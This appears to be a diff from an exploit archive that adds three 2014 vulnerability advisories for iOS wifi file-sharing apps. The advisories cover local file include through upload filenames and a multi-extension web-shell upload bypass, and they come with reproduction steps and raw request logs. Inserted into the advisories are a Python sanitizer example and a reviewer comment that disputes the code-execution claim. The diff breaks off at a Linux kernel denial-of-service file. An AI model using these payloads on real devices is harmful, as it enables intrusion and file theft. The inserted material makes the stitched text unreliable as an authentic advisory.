Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

platforms/ios/webapps/33630.txt (executable file)
@@ -0,0 +1,220 @@
Document Title:
===============
TigerCom My Assistant v1.1 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1268
Release Date:
=============
2014-05-23
Vulnerability Laboratory ID (VL-ID):
====================================
1268
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Folder manager, Convenient transmission, Document browsing, Compression & Decompression, Password-protected.
- Support multi-level directory management
- Add new folder
- Open camera, store photos and recording video
- Photos and video high fidelity storage
- Import photos and videos from album
- Export photos and videos to your album
- Copy, paste, delete, Email attachments
- Support multiple files operation
- Support sorting by name and type
- Icon shows file type
Convenient transmission:
- Wifi Transmission, you can share files between iphone, ipad and computer
- Current open folder sharing, better protect your privacy
- USB transfer and share files via Itunes
Document browsing:
- Txt document browsing and editing (txt)
- PDF document browsing (pdf)
- Word browsing (doc, docx)
- Excel browsing (xls, xlsx)
- PowerPoint browsing (ppt, pptx)
- Picture browsing (png, jpg, jpeg, jpe)
- Video player (mov, mp4, m4v, mpv, 3pg)
- Audio player (mp3, wav, aif)
Safety:
- Intelligent encryption, protect the folder
- Password-protected switch
( Copy of the Homepage: https://itunes.apple.com/en/app/my-assistant-free/id626680229 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official TigerCom My Assistant v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-05-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
TigerCom
Product: My Assistant Free 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official TigerCom My Assistant v1.1 iOS mobile web-application.
The vulnerability allows attackers on the same network to inject local file/path references or system-specific path values without
authorization and compromise the mobile web-application.
The vulnerability is located in the `filename` value of the `UPLOAD_FILE_TO_FOLDER` (uploadfile) module. Attackers are able to upload
their own files with malicious `filename` values in the `upload` POST method request; the value is stored unchanged and rendered into
the index file/folder listing, where the injected path becomes the link target (the vulnerable name/path value). The attacker delivers
the request through the available `wifi interface`.
The missing filename validation can also be combined with persistently injected script code to mount further attacks against users of
the listing. The attack vector is on the application side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System)
count of 7.0. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low
user interaction. Successful exploitation of the local file include web vulnerability results in compromise of the mobile application
or of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi Sharing
Vulnerable Module(s):
[+] UPLOAD_FILE_TO_FOLDER
Vulnerable File(s):
[+] uploadfile
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited by attackers on the local network with low user interaction. For security demonstration or
to reproduce the vulnerability, follow the information and steps below.
PoC: UPLOAD FILE TO FOLDER
<tbody><tr style="background:#fff;"><td colspan="2" align="left">Current Folder: Document</td></tr><tr style="background:#fff;">
<td colspan="2" align="right"><a href="/UPLOAD_FILE_TO_FOLDER">Uploading files</a> </td></tr><tr><td colspan="2">
<a href="68-2.png" target="_blank"> 68-2.png </a></td></tr><tr><td colspan="2">
<a href="%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype" target="_blank"> %20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype </a></td></tr>
<tr><td colspan="2"><a href="night-city-pictures-24.jpg" target="_blank"> night-city-pictures-24.jpg </a></td></tr>
</table></div></body>
</html></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/uploadfile Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/UPLOAD_FILE_TO_FOLDER]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------189051727528435
Content-Disposition: form-data; name="upload1"; filename="<%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype"
Content-Type: image/x
Reference(s):
http://localhost:8080/uploadfile
http://localhost:8080/UPLOAD_FILE_TO_FOLDER
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely restricting and parsing the vulnerable filename value in the multi upload module.
Restrict the input name value and encode the name output value in the index listing module to prevent further local file include attacks.
Do not forget to disallow multiple file extensions, which could otherwise be used to bypass the file type validation.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload to file index module is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

platforms/ios/webapps/33631.txt (executable file)
@@ -0,0 +1,213 @@
Document Title:
===============
AllReader v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1269
Release Date:
=============
2014-05-26
Vulnerability Laboratory ID (VL-ID):
====================================
1269
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
Professional helper on your iPhone, iPad, and iPod that will allow you to read virtually any file type right from your device: PDF, DJVU, DOC, XLS, PPT, TXT,
Image, Video files, whether these are important documents, books, student materials, notes or you can just view pictures and video clips.
Supported devices: iPhone 3Gs/4/4S/5, iPod Touch 4/5, all iPad generations.
(Copy of the Homepage: https://itunes.apple.com/us/app/all-reader./id871830567 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
Vulnerability Disclosure Timeline:
==================================
2014-05-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wylsacom Waytt
Product: AllReader - iOS Mobile Application 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
The vulnerability allows attackers on the same network to inject local file/path references or system-specific path values without
authorization and compromise the mobile web-application.
The vulnerability is located in the `filename` value of the `file upload` module. Attackers are able to upload their own files with
malicious `filename` values in the `file upload` POST method request; the value is stored unchanged and rendered into the index
file/path dir list, where the injected path becomes the link target. The attacker delivers the malicious file/path include request
through the available `wifi interface`.
The missing filename validation can also be combined with persistently injected script code to mount further attacks against users
of the listing. The attack vector is on the application side of the AllReader wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System)
count of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account and no
user interaction. Successful exploitation results in compromise of the mobile application or of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi Transfer UI
Vulnerable Module(s):
[+] Upload File
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability in the web-server can be exploited by local attackers without authentication or user interaction.
For security demonstration or to reproduce the security vulnerability, follow the information and steps below.
Manual steps to reproduce the security vulnerability ...
1. Install the iOS application (iPhone or iPad)
2. Start it, move to the settings menu and activate the wifi server
3. Go to another computer in the same network and browse to the local web-server URL (localhost:8080)
4. Upload a random image
5. Intercept the request with a tamper proxy and exchange the vulnerable `filename` value with your own malicious file or path request
Note: Payloads can be combined with script code to execute other attacks such as session hijacking or phishing
6. Submit the request and refresh the file dir index list
7. The code execution occurs in the file dir index list of the iOS app
8. Successful reproduction of the local file/path include web vulnerability
PoC: File Dir Index List - http://localhost:8080/
<html><head><title>Files from </title><meta http-equiv="Content-Type" content="text/html;
charset=UTF-8"><style>html {background-color:#eeeeee} body { background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif;
font-size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head><body><h1>Files from </h1>
<bq>The following files are hosted live from the iPhone's Docs folder.</bq><p><a href="..">..</a><br>
<a href="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY].png"><../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png</a> (0.5 Kb, 2014-05-26 11:49:04 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p></body></html>
--- POC SESSION LOGS [POST] ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[821] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------102203247921326
Content-Disposition: form-data; name="file"; filename="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png"
Content-Type: image/png
-- RESPONSE HEADER
Status: 200[OK]
GET http://localhost:8080/../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Content size[721] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[721]
Date[Mon, 26 May 2014 11:49:06 GMT]
Reference(s):
http://localhost:8080/
http://localhost:8080/../x
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable filename value in the upload module POST method request.
The file dir index list needs to encode malicious filenames even if the input is already parsed, to prevent further attacks via the file/path value.
Restrict, filter or use secure exception handling to disallow special characters, HTML tags and script code.
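Added example (not the vendors' code and not part of this or the TigerCom My Assistant advisory above): a Python model of the fix both solution sections describe. The handler validates the multipart `filename` on input (no path separators or `..`, no hidden names, exactly one allow-listed extension, so stacked names such as `pentest.png.js.html.php` are refused), confirms the resolved storage path stays inside the docs folder, and URL- and HTML-encodes the name when the file dir index list is rendered. The extension allow-list, the `/srv/docs` root and all function names are assumptions.

```python
import html
import os
import re
import urllib.parse

# Assumption: the app only needs to store these types; adjust per product.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "doc", "docx"}
_UNSAFE = re.compile(r"[^A-Za-z0-9_-]")  # anything else in the stem becomes '_'


class BadFilename(ValueError):
    """Raised when an upload name is rejected; the upload is refused, not renamed."""


def sanitize_upload_filename(raw, allowed=ALLOWED_EXTENSIONS):
    """Validate the Content-Disposition filename and return a safe basename.

    Rejects rather than rewrites anything that changes meaning: path
    separators, '..', NUL bytes, hidden names, a missing extension, a
    non-allow-listed extension and stacked extensions (a.png.php)."""
    if not raw or "\x00" in raw:
        raise BadFilename("empty name or NUL byte")
    if "/" in raw or "\\" in raw or ".." in raw:
        raise BadFilename("path components are not allowed")
    name = raw.strip()
    if not name or name.startswith("."):
        raise BadFilename("hidden or empty name")
    parts = name.split(".")
    if len(parts) != 2:  # exactly one dot: rejects 'noext' and 'a.png.php'
        raise BadFilename("exactly one extension is required")
    stem, ext = parts
    ext = ext.lower()
    if ext not in allowed:
        raise BadFilename(f"extension .{ext} is not allowed")
    stem = _UNSAFE.sub("_", stem)[:100]
    if not stem:
        raise BadFilename("empty stem")
    return f"{stem}.{ext}"


def storage_path(docs_root, safe_name):
    """Join the sanitized name to the docs folder and confirm the resolved path
    is still inside it (defence in depth against a sanitizer bypass)."""
    root = os.path.realpath(docs_root)
    full = os.path.realpath(os.path.join(root, safe_name))
    if os.path.commonpath([root, full]) != root:
        raise BadFilename("resolved path escapes the docs folder")
    return full


def render_listing_entry(name, size_bytes):
    """One row of the file dir index list: the name is encoded for both the
    href and the link text even though it was already validated on upload."""
    href = "/files/" + urllib.parse.quote(name)
    text = html.escape(name, quote=True)
    return (f'<tr><td class="file"><a href="{href}">{text}</a></td>'
            f'<td class="info">{size_bytes}B</td></tr>')


def handle_upload(raw_filename, data, docs_root="/srv/docs"):
    """Server-side flow for one multipart part: validate the name, resolve the
    target path, and build the listing row. Writing `data` to the returned
    path is left to the caller. Raises BadFilename on rejection."""
    safe = sanitize_upload_filename(raw_filename)
    path = storage_path(docs_root, safe)
    return path, render_listing_entry(safe, len(data))
```

Rejecting instead of silently stripping is deliberate: a name like `../.x.png` arriving from a browser is already evidence of tampering, and a renamed file would hide that from the user looking at the listing.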
Security Risk:
==============
The security risk of the local file/path include web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

platforms/ios/webapps/33632.txt (executable file)
@@ -0,0 +1,400 @@
Document Title:
===============
Bluetooth Photo-File Share v2.1 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1270
Release Date:
=============
2014-05-30
Vulnerability Laboratory ID (VL-ID):
====================================
1270
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
This is the best bluetooth sharing and file transfer app in the app store. Transfer photos, video, contacts and any file between two
iPhones, iPads and/or iPod Touches over a bluetooth connection. Requires iPhone 3G or later or 2nd generation iPod Touch or later.
Does not require any 3G or WiFi connection. Unlike some other bluetooth photo sharing apps that can only transfer photos from the Photo
Library, this bluetooth share can transfer not only photos but also video from the Photo Library.
( Copy of the Homepage: https://itunes.apple.com/de/app/bluetooth-photo-video-musik/id590369016 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-05-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Tao Xu
Product: Bluetooth Photo /Video /Musik /Contact /File Share - iOS Mobile Web Application 2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
The vulnerability allows attackers on the same network to inject local file/path references or system-specific path values without authorization and
compromise the mobile web-application.
The vulnerability is located in the `filename` value of the `data upload` module. Attackers are able to upload their own files with malicious `filename`
values in the `file upload` POST method request; the value is stored unchanged and rendered into the file/path dir index list, where the injected path
becomes the link target. The attacker delivers the request through the available `filesharing > wifi-transfer interface`.
Local attackers can also combine the missing filename validation with persistently injected script code to mount further attacks against users of the
listing. The attack vector is on the application side of the app's wifi-transfer service and the request method to inject is POST. The security risk of
the local file include web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.8.
Exploitation of the local file include web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the local file include web vulnerability results in compromise of the mobile application or of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Filesharing > Wi-fi Transfer UI
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions, bypass the file type validation and compromise the web-server.
The vulnerability is located in the upload file module. Remote attackers are able to upload php or js web-shells by renaming the file with multiple extensions
to bypass the file restriction mechanism. The attacker uploads, for example, a web-shell with the name and extensions `pentest.png.js.html.php`. After the
upload the attacker opens the file in the web application, removes the .png file extension and can access the application with elevated access rights.
The security risk of the arbitrary file upload web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 7.1.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction and no privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access through the uploaded web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Filesharing > Wi-fi Transfer UI
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without a privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps below.
Manual steps to reproduce the vulnerability ...
1. Install the mobile application on your Apple iOS device (iPhone/iPad)
2. Open the application locally and activate the wifi transfer & export function
3. From another device in the same network, open the application interface (localhost:8080)
4. Choose a random file to upload, start a tamper proxy to intercept the session and press the submit button
5. In the intercepted POST method request of the upload module, change the vulnerable `filename` value
Note: Include for example a local device component file or a mobile application path as the value
6. Let the request continue, refresh the index page and download the local file or request the mobile device path without authorization
7. Successful reproduction of the local file include web vulnerability!
PoC: Wi-fi Transfer (UI) - Index File Dir Listing
<div class="filetable">
<table border="0" cellpadding="0" cellspacing="0"></table>
<table id="filetable" cellpadding="0" cellspacing="0" width="860px"><thead><tr>
<th class="file">File Name</th><th style="padding-left:15px">File Size</th><th class="actionbutton"></th><th class="actionbutton"></th></tr>
</thead><tbody id="filelist" style="padding-left:15px;">
<tr><td class="file"><a href="/files/./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE].png" class="file">
<./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]">.png</a></td><td class='info'>538.00B</td>
<td class='actionbutton' ><form><input type='button' value='Download'
onClick="window.location.href='/files/./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE].png'"></form></td>
<td class='actionbutton' ><form action='/files/%3Ciframe%20src=a%3E.png' method='post' ><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr></tbody></table>
<br><br></div>
--- POC SESSION LOGS [POST] (LFI) ---
19:32:08.304[128ms][total 128ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------284152263011599
Content-Disposition: form-data; name="newfile"; filename="<iframe src=a>.png"
Content-Type: image/png
-
19:32:09.312[129ms][total 177ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content size[61465] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[61465]
Date[Wed, 28 May 2014 17:45:38 GMT]
-
19:32:10.023[143ms][total 143ms] Status: 200[OK]
GET http://localhost:8080/files?Wed%20May%2028%202014%2019:32:09%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Content size[60] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[60]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Wed, 28 May 2014 17:45:39 GMT]
-
19:32:10.623[147ms][total 147ms] Status: 200[OK]
GET http://localhost:8080/.././[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]; Load Flags[LOAD_DOCUMENT_URI ] Content size[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Wed, 28 May 2014 17:45:39 GMT]
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps below.
PoC:
19:32:11.222[142ms][total 142ms] Status: 200[OK]
GET http://localhost:8080/files/pentest.png.js.html.php
Manual steps to reproduce the vulnerability ...
1. Install the mobile application on your Apple iOS device (iPhone/iPad)
2. Open the application locally and activate the wifi transfer & export function
3. From another device in the same network, open the application interface (localhost:8080)
4. Choose a random file to upload, start a tamper proxy to intercept the session and press the submit button
5. In the intercepted POST method request of the upload, change the vulnerable `filename` value
Note: Use a webshell name with multiple file extensions (e.g. pentest.png.js.html.php.aspx.js.png) to bypass the mobile application filter
6. Upload the file, refresh, and then request the following URL: http://localhost:8080/files/pentest.png.js.html.php.aspx.js.png
Note: To execute the arbitrary code it is required to remove the .png file extension
7. Successful reproduction of the arbitrary file upload web vulnerability!
--- POC SESSION LOGS [POST] (AFU) ---
19:32:08.304[128ms][total 128ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------284152263011599
Content-Disposition: form-data; name="newfile"; filename="pentest.png.js.html.php.aspx.js.png"
Content-Type: image/png
-
19:32:09.312[129ms][total 177ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[61465]
Date[Mi., 28 Mai 2014 17:45:38 GMT]
-
19:32:10.023[143ms][total 143ms] Status: 200[OK]
GET http://localhost:8080/files?Wed%20May%2028%202014%2019:32:09%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[60] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[60]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Mi., 28 Mai 2014 17:45:39 GMT]
-
19:32:10.623[147ms][total 147ms] Status: 200[OK]
GET http://localhost:8080/pentest.png.js.html.php.aspx.js.png Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Mi., 28 Mai 2014 17:45:39 GMT]
-
19:32:11.222[142ms][total 142ms] Status: 200[OK] GET http://localhost:8080/files/pentest.png.js.html.php
Reference(s):
http://localhost:8080/files/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure encode and validation of the filename value itself. Parse also the output filename listing in the index module
to prevent further local file/path include attacks.
1.2
Restrict the filename value input by disallow of special chars. Only allow letters and numbers. Proof for multiple file extensions and block/replace them.
use a secure exception-handling or filter mechanism to prevent further arbitrary file upload attacks.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability in the wifi web-server ui is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
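Review bot: section 1.2 claims arbitrary code execution but the session log does not support it: the note after step 6 says the `.png` extensions must be deleted before the uploaded file executes, yet nothing in the hunk shows how a remote attacker without an account would rename the stored file, and the request for the uploaded name at 19:32:10.623 comes back `200` with `Content-Length[0]` and `Mime Type[application/x-unknown-content-type]`, while the final `GET /files/pentest.png.js.html.php` at 19:32:11.222 shows a bare `200` with no body or headers, i.e. the wifi web server hands the file back as an opaque download rather than interpreting it. Describe the impact as upload of arbitrary file types, combined with the filename path traversal of 1.1 (`GET /.././...`), unless a server-side interpreter is identified. In the fix section, "only allow letters and numbers" would also reject the dot of a legitimate extension; instead allowlist one final extension, generate the stored name server-side, and reject any decoded filename containing `/`, `\`, or a `..` component, which covers the 1.1 include as well.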

155
platforms/linux/dos/33635.c Executable file
@ -0,0 +1,155 @@
source: http://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
/*****************************************************************************
